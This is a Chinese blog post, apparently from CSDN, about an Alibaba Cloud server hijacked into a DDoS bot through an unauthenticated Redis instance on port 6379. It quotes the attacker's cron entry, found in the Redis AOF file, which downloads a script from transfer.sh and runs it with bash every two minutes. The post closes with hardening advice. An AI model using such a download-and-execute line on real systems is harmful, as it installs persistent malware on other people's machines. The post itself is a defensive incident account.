记一次阿里云esc实例被黑客利用redis默认端口6379入侵变成肉鸡的悲惨经历

最新推荐文章于 2024-05-18 14:33:26 发布
最新推荐文章于 2024-05-18 14:33:26 发布
阅读量4.6k 收藏 2
点赞数
分类专栏: 感悟杂谈
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38423798/article/details/79896225
版权

首先声明:因为刚入手实例,网站还在申请中。故只是搭建个redis集群供远程测试调用方便而已。因为机器上并没有项目和其他东西,为了方便redis使用的默认端口。最重要的是:配置文件中bind:标签并没有绑定ip,并且redis访问设置并没有设置密码,这就是悲剧的开始。

        4月10号阿里云发邮件称服务器实例通过6379端口向外发出ddos攻击,我心里猜测应该就是通过redis被黑了。登录实例发现有一个进程.gcg进程。该进程占用cpu99%。通过查找redis的aof持久化文件,发现黑客写入如下命令:

 */2 * * * * curl -s https://transfer.sh/QGpty/tmp.aXNXdOOWFw > .cmd && bash .cmd 
https://transfer.sh是一个命令行脚本自由存储下载网站,利用该操作下载并且自动安装了一些东西。最后初始化磁盘完事。
           感悟:网络安全无小事,任何的侥幸心理都不可有。对于redis的使用,尽量不要暴露在公网ip之下,并且不要使用默认端口,最好绑定可使用ip和设置密码等等。


一只奋斗的小白白
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
redis漏洞引发的入侵
onlyellow的博客
02-28 2757
有一台服务器莫名其妙的无法正常免密登录了,密码登录也被禁止了:只好去机房直接接上显示器检查。结果发现免密相关文件authorized_keys被修改的一塌糊涂:不是像其他木马或者病毒那样只是增加自己的免密登录信息,而是全部写成乱码形式:文件开头可以看到"REDIS0007 redis-ver3.2.8"的字样。 一开始感觉是木马故意混淆视线嫁祸redis(事后才发现是redis没有设置登录密码导
redis基础操作内容以及为什么端口号是6379-redis从入门到入坑(3)
qq_44417051的博客
08-27 512
基础知识
Python 渗透测试:Redis 数据库 弱密码测试.(6379端口
最新发布
网络安全领域___专研者.
05-18 569
Redis (Remote Dictionary Server) 是一个开源的、内存中的数据结构存储系统,它可以用作数据库、缓存和消息中间件。它支持多种类型的数据结构,如字符串(strings)、哈希(hashes)、列表(lists)、集合(sets)、有序集合(sorted sets)等,并且能够对这些数据结构进行高级操作。Redis 数据库爆破是指利用暴力破解的方式尝试获取 Redis 数据库的访问权限。
Redis后门植入分析报告
weixin_34416754的博客
03-08 518
唐朝实验室 · 2015/11/13 18:32唐朝实验室蜜网项目组0x00 概述redis是一款基于内存与硬盘的高性能数据库,在国内外被大型互联网企业、机构等广泛采用。但其一些安全配置经验却不如“LAMP”等成熟,所以很多国内企业、机构的redis都存在简单的空口令、弱密码等安全风险。11月10号,国外安全研究者的一份文档展示,redis在未进行有效验证,并且服务器对外开启了SSH服务的前提下,...
阿里云6379端口被攻击
qq_20786911的博客
03-23 1775
使用top命令查看cpu使用率,发现使用率达98% 分别杀掉进程和守护进程
解决腾讯云服务器存在端口(6379)对外攻击行为
m0_53078233的博客
04-13 7831
解决腾讯云服务器存在端口(6379)对外攻击行为
阿里云 Redis 开发规范
01-07
本文主要介绍在使用阿里云 Redis 的开发规范,从下面几个方面进行说明。 键值设计 命令使用 客户端使用 相关工具 通过本文的介绍可以减少使用 Redis 过程带来的问题。 一、键值设计 1、key 名设计 可读性和可管理性 ...
阿里云公网redis集群搭建以及java访问redis集群
04-20
总结,通过以上步骤,我们成功地在阿里云上搭建了一个公网访问的Redis集群,并利用Java进行了有效访问。注意在实际生产环境中,应考虑高可用性、安全性以及性能优化等问题,例如使用哨兵系统监控和自动故障切换,...
阿里云Redis开发规范1
08-03
阿里云Redis开发规范1主要关注键值设计、命令使用、客户端使用等方面,旨在优化Redis的使用,提高系统性能,防止潜在的问题。 1. 键值设计: - 建议使用业务名称作为前缀,避免键冲突,例如`业务名:表名:id`。 - ...
阿里云 专有云企业版 V3.8.1 云数据库 Redis 版 运维指南 20190910
04-07
"阿里云 专有云企业版 V3.8.1 云数据库 Redis 版 运维指南 20190910" 本资源摘要信息主要讲解了阿里云专有云企业版V3.8.1云数据库Redis版的运维指南,涵盖了法律声明、通用约定、运维工具、系统架构、产品架构等...
阿里云 专有云企业版 V3.12.0 云数据库 Redis 版 用户指南 20200622
05-23
综上所述,阿里云专有云企业版V3.12.0云数据库Redis版用户指南是一个详尽的资源,涵盖了从产品介绍到实际操作的各个方面,旨在帮助用户充分利用此云数据库服务。用户在使用过程中,应遵循文档的指导,并时刻关注阿里...
苍了个天,一次Linux(被黑客)入侵......
<sdffdsfsdfdfs>sfsfsfsdfsdffds</sdfsDS>Fsd
10-22 287
Python实战社群Java实战社群长按识别下方二维码,按需求添加扫码关注添加客服进Python社群▲扫码关注添加客服进Java社群▲来源丨网络安全编程与黑客程序员https://mp....
请务必注意 Redis 安全配置,否则将导致轻松被入侵
多看多听多总结
12-16 4337
一、前言 前段时间,在做内网影响程度评估的时候写了扫描利用小脚本, 扫描后统计发现,内网中60%开放了redis6379端口的主机处于可以被利用的危险状态,因为都是一些默认配置造成的 考虑到本社区大部分开发者都会使用redis,特此分享下以便大家可以对自己公司的内网进行一个排查。 二、漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Red
Redis端口为什么是6379?
corleone_4ever的博客
01-30 1万+
先介绍下redis的作者Salvatore Sanfilippo(Antirez),意大利人,就是下图这位。 Antirez现在已经40多岁了,依然奋斗在代码一线,为开源社区做贡献。Antirez出生在非英语系国家,所以英语一直是他的短板。他曾经写过一篇博文,《英语伤痛 15 年》,以自己的实际经历鼓励非英语系国家的程序员突破英语障碍。或说回来,在他的另一篇博文《Redis as an...
如何防止redis服务器被鸡肉
weixin_33859504的博客
08-11 123
问题是周六上午十点发现自己的备份邮件中突然少了一台数据库中的备份数据,当时也没考虑太多,(从这里看出,还不具备运维的思维,哪怕是一个小小的备份也要 重视,为什么会少一台服务器的备份数据)居然过了周末,周一到了上班时间,突然想到周六的备份数据少了,这时候才想到数据库服务器 的数据没有被推送到备份服务器,当然先下手就是看定时任务了,然而,查看到定时任务,一下子震惊了。。。。。[...
redis 6379端口不通解决方法
热门推荐
qq_36133698的博客
07-18 3万+
1.reids服务器的6379端口telnet不通 2. 查看reids进程和端口,都是存在的。只是ip地址是127.0.0.1而不是0.0.0.0,只是本机能使用 3.查找redis的配置文件redis.conf   使用命令:find / -name redis.conf  4.查找bind 127.0.0.1所在的行数    使用命令:cat /usr/local/re...
Redis端口--6379 的特殊含义
S_Running_snail的博客
11-27 8763
前几天Redis作者antirez同学在twitter上说将在下一篇博文中向大家解释为什么他选择6379作为默认端口号。而现在这篇博文出炉,在解释了Redis的LRU机制之后,如期向大家解释了采用6379作为默认端口的原因。 6379在是手机按键上MERZ对应的号码,而MERZ取自意大利歌女Alessia Merz的名字。MERZ长期以来被antirez及其朋友当作愚蠢的代名词。   原文:...
Redis之轨迹】一次 Linux 服务器惨遭挖矿的经历 [kdevtmpfs](Redis 安全问题)
Ice__Clean的博客
09-30 398
Redis 漏洞说明 Redis 默认情况下,会绑定在 0.0.0.0:6379,在没有利用防火墙进行屏蔽的情况下,将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,将导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。 攻击者在未授权访问 Redis 的情况下利用 Redis 的相关方法,可以成功将自己的公钥写入目标服务器的 ~/.ssh 文件夹的 authotrized_keys 文件中,进而可以直接登录目标服务器。如果Redis服务是以roo.
阿里云专有云V3.12.0云数据库Redis开发指南-法律声明与免责声明
阿里云专有云企业版V3.12.0云数据库Redis版开发指南,发布于2020年07月02日,是针对该产品版本的技术文档,旨在帮助用户更好地理解和利用阿里云提供的云数据库Redis服务。本指南涉及了重要的法律声明,确保用户在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值